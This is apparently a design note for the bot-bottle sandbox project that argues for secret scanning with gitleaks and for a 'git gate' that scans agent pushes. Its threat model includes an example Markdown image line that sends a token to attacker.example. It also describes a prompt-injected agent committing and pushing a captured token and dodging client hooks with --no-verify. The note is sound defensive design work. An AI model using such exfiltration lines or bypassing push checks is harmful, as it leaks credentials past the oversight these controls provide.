# Git secret scanning as further hardening

Research into whether bot-bottle should add a secret-scanning step to
its git workflow — both on the host repo and (potentially) inside
bottles — and what tools exist for it. Motivated by the threat model
below: a secret accidentally `git push`ed to a public remote is
*already compromised* the moment the push hits the wire, well before
anyone clicks "merge."

## Summary

A pre-commit / pre-push secret scanner is a cheap, high-leverage layer
of defense-in-depth that doesn't replace any existing control
(`.gitignore`, environment-variable hygiene, network egress guards) but
catches the one case where everything else fails: a credential ending
up in a tracked file or commit message and being pushed to a public
remote. For bot-bottle specifically, `gitleaks` is the clearest fit
— Go binary, MIT, scans full history including commit messages, runs
fully offline, and integrates with the existing `.githooks/` directory
without adding a new runtime.

## Attack vector: a secret pushed to a public GitHub repo

The naive mental model is "if I notice the leak before the PR is
merged, I can force-push and the secret is gone." That mental model is
wrong in two distinct ways, and both apply *the instant* `git push`
completes — not at merge time.

### 1. The push itself publishes the secret

The moment a commit lands on a public GitHub repo — on any branch, in
any open PR, on any fork — it is publicly fetchable by URL and
broadcast by GitHub's event firehose:

- The commit blob is reachable at `github.com/<owner>/<repo>/commit/<sha>`
  and via the raw API. No login or merge required.
- GitHub's public events API streams every push as it happens. The
  GH Archive project mirrors that stream and republishes it; multiple
  Common-Crawl-style datasets ingest from it on a continuous basis.
- Independent scrapers (and there are *many*) sit on the events API
  watching specifically for commits whose diffs match high-value
  credential patterns: AWS keys, GitHub PATs, Stripe keys, OAuth
  tokens, OpenAI keys, etc. Reported time-to-abuse for an AWS key
  leaked in a public push is on the order of *seconds to minutes*.
  The window in which "I'll just force-push" still works effectively
  does not exist.
- Even after a force-push, the orphaned commit remains reachable by
  SHA until GitHub garbage-collects it, which the repo owner cannot
  trigger directly and which may not happen for a long time (and the
  SHA itself leaks via the events API). Treat any secret that has
  touched a public remote as burned: rotate it.

This is the dominant risk, and on its own it is enough to justify
pre-push secret scanning.

### 2. Render-time callbacks fire even on un-merged PRs

A separate, sneakier vector: a public PR doesn't have to be *merged*
to cause an outbound request to a server the pusher controls. Opening
the PR is enough. Rendering surfaces along the review path will fetch
remote resources embedded in the diff or in PR metadata:

- **Markdown files in the diff** are rendered with image and link
  preview support. An `![](https://attacker.example/pixel.png?token=…)`
  in a new README pings the attacker the moment a reviewer (or
  GitHub's own renderer warming a cache) views the file. GitHub
  proxies most image fetches through `camo.githubusercontent.com`,
  which mitigates direct IP capture but *does not stop the fetch
  itself* — the attacker still gets the request, and the URL path
  can carry exfiltrated bytes.
- **PR body, commit message, and issue body** all render markdown
  with the same image/link semantics. A poisoned commit message
  with an embedded image URL pings home when the PR is opened in the
  web UI, regardless of merge state.
- **Link unfurls** in PR descriptions, Slack notifications wired to
  the repo, and various CI bots all dereference URLs at preview time.
  Each is an independent "ping home" opportunity.
- **CI on PR open** executes code from the PR head in many
  configurations (subject to the host's fork-approval settings). Any
  `curl` in a build step is an exfil channel before a human ever
  looks at the PR.

The composite point: by the time a reviewer thinks "hmm, this looks
suspicious, let me close without merging," the bytes that mattered are
already on the attacker's box. Detection has to be at *commit* time
(or *push* time at the latest), not at review time.
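
To make the Markdown vector above concrete, here is a minimal sketch that lists the remote image targets a renderer would fetch from a piece of Markdown (a file in the diff, a PR body, or a commit message). The function name and the regular expression are illustrative assumptions, not part of bot-bottle; only inline `![alt](url)` syntax is handled.

```python
import re
from typing import List, Tuple
from urllib.parse import urlsplit

# Inline Markdown image syntax: ![alt](url ...). Reference-style images and
# raw HTML <img> tags are deliberately not handled in this sketch.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*(https?://[^)\s]+)")


def remote_image_targets(markdown: str) -> List[Tuple[str, str]]:
    """Return (host, query string) for each remote image a renderer would fetch."""
    targets = []
    for url in MD_IMAGE.findall(markdown):
        parts = urlsplit(url)
        # The query string (and the path) is attacker-chosen, so it can
        # carry arbitrary bytes to the host that serves the image.
        targets.append((parts.hostname or "", parts.query))
    return targets
```

Every tuple returned is a request that leaves the review surface when the text is rendered, whether or not the PR is ever merged.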

### Why this matters for bot-bottle

Two surfaces are exposed:

1. **The bot-bottle repo itself.** Development happens on a host
   with `BOT_BOTTLE_CLAUDE_OAUTH_TOKEN`, Gitea tokens, and other
   credentials in the environment. A fixture, test snapshot, log
   capture, or pasted-in debug output could carry one of them into a
   tracked file. The repo's Gitea remote is private, but mirrors or
   GitHub forks may not be.
2. **Bottles that push to external remotes.** An agent inside a bottle
   that has been granted git push credentials to a public repo is one
   prompt-injection away from being induced to commit a captured token
   and push it. The egress guard catches *most* exfiltration channels
   (`statsig`, `npm`, arbitrary HTTPS), but `git push` to an
   allowlisted code host is by design an outbound channel that *works*.
   That is the whole point of letting the agent push code. A secret
   scanner inside the bottle's git hooks is the only layer that can
   intercept content before it leaves on an otherwise-legitimate
   channel.

The first surface is the primary one for this note. The second
*looks* harder: anything inside the bottle is by assumption
adversary-controlled, so an in-bottle hook can be bypassed with
`--no-verify`, removed outright, or simply not configured. It
yields, however, to the same trick already used for the OAuth token
and HTTPS inspection: move the check across a kernel-enforced
process boundary that the agent cannot reach.

### Solution for the bottle surface: a git gate

Route bottle-side `git push` through an intermediary git endpoint —
a "git gate" — that runs gitleaks on the incoming objects before
forwarding to the real remote:

- The bottle's git remote is rewritten to point at the gate (e.g.
  `git@gate.bottle.local:owner/repo.git`, or an HTTPS endpoint on a
  loopback / sidecar address). The agent inside the bottle sees only
  the gate URL.
- The gate runs as a separate process / container that the bottle's
  unprivileged agent cannot read or modify. It holds the real push
  credential (deploy key, PAT, ssh agent socket) — the bottle never
  sees it, same as the auth-injecting proxy for `ANTHROPIC_BASE_URL`
  in `agent-credential-proxy-landscape.md`.
- On receive, the gate runs `gitleaks detect` against the incoming
  refs (and their message text) in a temporary working tree. Clean
  pushes are forwarded to the real remote. Findings cause the push to
  be rejected; the agent sees a normal-looking `remote: rejected`
  message.
- Network egress out of the bottle is locked to the gate only.
  Direct pushes to `github.com`, `gitlab.com`, etc., fail at the
  egress layer, so the agent cannot bypass the gate by reconfiguring
  the remote URL. The egress guard already in `network-egress-guard.md`
  is the load-bearing control here.
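
The receive-side check described above could be sketched as follows, assuming the gate is implemented as a git `pre-receive` hook (which reads one `<old-sha> <new-sha> <ref>` line per updated ref on stdin) and that the repository uses SHA-1 object names. The function names are hypothetical, and the gitleaks invocation uses the same `detect --log-opts` form as the rest of this note; treat it as an illustration of the control flow, not a finished gate.

```python
import subprocess
from typing import Callable, Iterable, Optional

ZERO_SHA = "0" * 40  # git's placeholder for "no commit" (ref created or deleted)


def log_opts_for_update(old: str, new: str) -> Optional[str]:
    """Return `git log` arguments selecting the commits one ref update adds.

    Returns None for a ref deletion, which introduces no new content.
    """
    if new == ZERO_SHA:
        return None
    if old == ZERO_SHA:
        # New ref: commits reachable from it that no existing ref already has.
        return f"{new} --not --all"
    return f"{old}..{new}"


def should_forward(updates: Iterable[str], scan: Callable[[str], bool]) -> bool:
    """Return True only if every ref update in the push scans clean."""
    for line in updates:
        old, new, _ref = line.split()
        opts = log_opts_for_update(old, new)
        if opts is not None and not scan(opts):
            return False  # one finding rejects the whole push
    return True


def gitleaks_scan(log_opts: str, repo: str = ".") -> bool:
    """Run gitleaks over the selected commits; any failure counts as dirty."""
    try:
        result = subprocess.run(
            ["gitleaks", "detect", "--source", repo,
             "--log-opts", log_opts, "--redact"],
            capture_output=True,
        )
    except FileNotFoundError:
        return False  # scanner missing: fail closed
    return result.returncode == 0
```

A hook built on this would call `should_forward(sys.stdin, gitleaks_scan)` and exit non-zero on `False`, which git reports to the pusher as a rejected push. Treating every non-zero gitleaks exit as a rejection keeps the gate fail-closed when the scanner itself errors.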

Properties this gives:

- **`--no-verify` does not help the attacker** — the check runs on the
  *receiving* side, not in a client hook.
- **Bypass attempts fail closed.** Removing the remote, force-pushing,
  pushing to a different host, or shelling out around git all hit the
  same egress allowlist.
- **The push credential never enters the bottle.** Compromising the
  agent doesn't compromise the credential, only the ability to ask the
  gate to push on its behalf — and the gate refuses dirty pushes.
- **Pattern is reusable.** The gate is shape-compatible with the
  auth-injecting proxy and with pipelock's TLS interception: a
  sidecar that holds the credential, enforces a policy on traffic,
  and is unreachable by the unprivileged in-bottle UID.

Open questions deferred to design work, not blockers for this note:

- SSH vs HTTPS for the bottle→gate hop. SSH lets the agent use a
  per-bottle key the gate authenticates; HTTPS over loopback is
  simpler and pairs naturally with pipelock.
- Whether the gate should also enforce repo / branch allowlists per
  bottle, or stay narrowly focused on secret scanning. Probably
  narrow first, expand later.
- Performance on large pushes. gitleaks on a few-MB diff should be
  sub-second; on the first push of a large monorepo it may take
  seconds. That is acceptable for a push path.

## Tool landscape (2026)

| Tool | Install | Full history | Commit msgs | Detection | Status | License |
|---|---|---|---|---|---|---|
| **gitleaks** | `brew install gitleaks` | yes (`--log-opts="--all"`) | yes | regex + entropy, ~150 rules | very active (v8.x) | MIT |
| **TruffleHog v3** | `brew`, Docker, GH Action | yes | yes | regex + **live API verification** (700+ types) | very active | AGPL-3.0 |
| **detect-secrets** (Yelp) | `pip install` | working tree + baseline | no | regex + entropy | active, slower cadence | Apache 2.0 |
| **git-secrets** (AWS Labs) | `brew` | yes (`--scan-history`) | yes | regex only, AWS-focused | maintenance mode since ~2021 | Apache 2.0 |
| **ggshield** (GitGuardian) | `pip install` | yes | yes | proprietary ML + regex, optional verified | very active, commercial | MIT CLI, SaaS engine |

Other names that surfaced but do not fit: Semgrep (general SAST, not
git-history-native), `whispers` (Python, low adoption).

Notes on the contenders:

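- **gitleaks** is the de-facto open-source standard. The `protect
  --staged` mode is purpose-built for pre-commit; the `detect
  --log-opts="--all"` mode walks every commit including message text.
  No network dependency. Releases from v8.19 onward deprecate
  `detect` and `protect` in favor of `gitleaks git` (the old commands
  still run), so pin a version or check `gitleaks --help` before
  wiring the hook.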
- **TruffleHog v3** is the strongest one-shot auditor because it can
  make live API calls to confirm whether a found credential is still
  valid. AGPL is fine for internal use but a consideration if the
  detection step gets embedded in a redistributable artifact. Best as
  a "run once on history" tool, not as the everyday hook.
- **detect-secrets** is well-loved for its baseline-file workflow (you
  declare existing secrets as known and only fail on new ones), but
  commit-message scanning is not first-class.
- **git-secrets** is effectively superseded by gitleaks. No reason to
  start a new project on it.
- **ggshield** is good if you want a hosted dashboard and incident
  management, but it ships repo content to GitGuardian's API by
  default — wrong fit for a project whose entire premise is sandbox
  isolation.
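
For readers unfamiliar with the "regex + entropy" detection listed in the table, the idea can be sketched in a few lines. This is not how gitleaks or any listed tool is implemented: the rule names, the generic assignment pattern, and the 3.5-bit threshold are assumptions chosen for illustration. The only non-hypothetical detail is the shape of an AWS access key ID (`AKIA` followed by 16 uppercase alphanumerics).

```python
import math
import re
from collections import Counter
from typing import List, Tuple

# Fixed-shape rule: AWS access key IDs are "AKIA" + 16 uppercase alphanumerics.
AWS_KEY_ID = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
# Hypothetical generic rule: a long token assigned to a secret-looking name.
GENERIC_ASSIGNMENT = re.compile(
    r"(?i)(?:secret|token|api_key|password)\w*\s*[:=]\s*['\"]?([A-Za-z0-9+/_\-]{20,})"
)


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character, from the string's own character counts."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def find_secrets(text: str, min_entropy: float = 3.5) -> List[Tuple[str, str]]:
    """Return (rule name, matched value) pairs for likely secrets in text."""
    # Fixed-shape matches are reported regardless of entropy.
    findings = [("aws-access-key-id", m) for m in AWS_KEY_ID.findall(text)]
    # Generic matches are kept only if they look random enough, which
    # filters out placeholders such as long runs of one character.
    for candidate in GENERIC_ASSIGNMENT.findall(text):
        if shannon_entropy(candidate) >= min_entropy:
            findings.append(("generic-high-entropy", candidate))
    return findings
```

The regex supplies precision for credentials with a known shape, and the entropy filter keeps the looser generic rule from firing on obvious dummy values.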

## Commit message scanning

Several real-world leaks have come from secrets pasted into commit
messages (often by automation that includes captured CLI output in
auto-generated messages). gitleaks, TruffleHog, git-secrets, and
ggshield all scan message text in history mode. detect-secrets does
not — it is content-focused. Anyone using detect-secrets should pair
it with a separate message-scanning step.
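
A separate message-scanning step of that kind could look like the sketch below, written as the body of a `commit-msg` hook (git passes the path of the message file as the hook's first argument). The two patterns are illustrative only, and `scan_message` and `main` are hypothetical names; a real deployment would more likely hand the message to a maintained rule set.

```python
import re
import sys
from pathlib import Path
from typing import List

# Illustrative patterns only; a maintained rule set covers far more types.
PATTERNS = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github-pat-classic": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
}


def scan_message(text: str) -> List[str]:
    """Return the names of the patterns that match the commit message."""
    return [name for name, pattern in PATTERNS.items() if pattern.search(text)]


def main(argv: List[str]) -> int:
    """commit-msg entry point: argv[1] is the path to the message file."""
    message = Path(argv[1]).read_text(encoding="utf-8", errors="replace")
    hits = scan_message(message)
    for name in hits:
        print(f"commit message matches secret pattern: {name}", file=sys.stderr)
    return 1 if hits else 0  # non-zero aborts the commit
```

A hook script would end with `sys.exit(main(sys.argv))`. The matched value itself is never printed, so the hook does not copy the secret into terminal scrollback or CI logs.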

## Recommended path forward

In priority order, for the host bot-bottle repo:

1. **One-time retro scan** with gitleaks:
   `gitleaks detect --source . --log-opts="--all" --redact`.
   Catches anything currently in history including commit messages.
   `--redact` keeps any findings out of the rendered output. Treat any
   hit as a credential to rotate, not as a "fix the commit" problem (see
   the attack-vector section above for why).
2. **Add a pre-commit hook in `.githooks/`** that runs
   `gitleaks protect --staged`. Fits the project's existing pattern
   (the conventional-commits `commit-msg` hook lives there), needs no
   new runtime, fully offline.
3. **Optional one-time live-verification pass** with TruffleHog:
   `trufflehog git file://. --only-verified` (newer releases document
   `--results=verified` for the same filter). Tells you whether any
   historically leaked credential is still active, which is
   actionable in a way pattern-matching alone is not.
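
The control flow of the pre-commit hook in step 2 can be sketched as below. In practice the hook would most naturally be a few lines of POSIX shell so that no new runtime is needed; it is written in Python here only for illustration. The function names are hypothetical, and the sketch assumes `core.hooksPath` already points at `.githooks/` and that gitleaks exits non-zero when it finds something.

```python
import subprocess
import sys
from typing import Callable, Sequence

GITLEAKS_CMD = ["gitleaks", "protect", "--staged", "--redact"]


def run_command(cmd: Sequence[str]) -> int:
    """Run a command, letting its output reach the terminal; return its status."""
    return subprocess.run(list(cmd)).returncode


def pre_commit(run: Callable[[Sequence[str]], int] = run_command) -> int:
    """Return the hook's exit status: 0 allows the commit, non-zero blocks it."""
    try:
        status = run(GITLEAKS_CMD)
    except FileNotFoundError:
        # Assumption: a missing scanner should block the commit (fail closed).
        print("gitleaks not found on PATH; refusing to commit unscanned changes",
              file=sys.stderr)
        return 1
    if status != 0:
        print("gitleaks reported findings in staged changes; commit blocked",
              file=sys.stderr)
        return 1
    return 0
```

Failing closed when gitleaks is absent is a design choice: it trades some friction on a fresh checkout for the guarantee that the hook never silently degrades into a no-op.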

For the bottle surface, the follow-up is the git-gate design sketched
above: a sidecar git endpoint that bottles push to, that runs
gitleaks on incoming refs before forwarding to the real remote, with
egress locked to the gate so the agent cannot push directly. Tracked
as a future PRD; ordering it after the network egress guard is
correct because the egress allowlist is the control that prevents
bypass and is therefore the prerequisite.

## Sources

- [gitleaks — GitHub repository](https://github.com/gitleaks/gitleaks)
- [TruffleHog — GitHub repository](https://github.com/trufflesecurity/trufflehog)
- [detect-secrets — GitHub repository](https://github.com/Yelp/detect-secrets)
- [git-secrets — AWS Labs GitHub repository](https://github.com/awslabs/git-secrets)
- [GitGuardian ggshield](https://github.com/GitGuardian/ggshield)
- [GH Archive — public GitHub event firehose mirror](https://www.gharchive.org/)
- [camo image proxy (atmos/camo GitHub repository)](https://github.com/atmos/camo)
- [Truffle Security — "How fast are leaked secrets abused?"](https://trufflesecurity.com/blog/)